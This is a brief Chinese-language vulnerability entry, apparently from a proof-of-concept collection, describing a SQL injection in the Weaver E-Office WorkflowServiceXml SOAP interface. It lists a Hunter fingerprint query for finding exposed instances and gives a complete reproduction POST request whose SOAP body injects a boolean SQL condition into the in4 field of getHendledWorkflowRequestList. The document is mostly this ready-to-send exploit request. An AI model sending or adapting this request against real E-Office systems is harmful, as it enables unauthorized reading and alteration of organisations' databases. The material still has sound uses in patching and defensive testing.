泛微 E-Office WorkflowServiceXml SQL注入漏洞
一、漏洞简介
泛微 E-Office 协同办公平台<font style="color:rgba(0, 0, 0, 0.9);">WorkflowServiceXml</font>接口存在SQL注入漏洞,攻击者可利用该漏洞执行任意SQL语句,进行增、删、改、查等数据库操作,造成数据库敏感数据信息泄露或被篡改
二、影响版本
- 泛微E-office
三、资产测绘
- hunter
app.name="泛微 e-office OA" - 特征
四、漏洞复现
POST /services/WorkflowServiceXml HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Length: 422
Connection: close
Content-Type: text/xml
Accept-Encoding: gzip
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://webservices.workflow.weaver">
<soapenv:Header/>
<soapenv:Body>
<web:getHendledWorkflowRequestList>
<web:in0>1</web:in0>
<web:in1>1</web:in1>
<web:in2>1</web:in2>
<web:in3>1</web:in3>
<web:in4>
<web:string>1=1 AND 2=2</web:string>
</web:in4>
</web:getHendledWorkflowRequestList>
</soapenv:Body>
</soapenv:Envelope>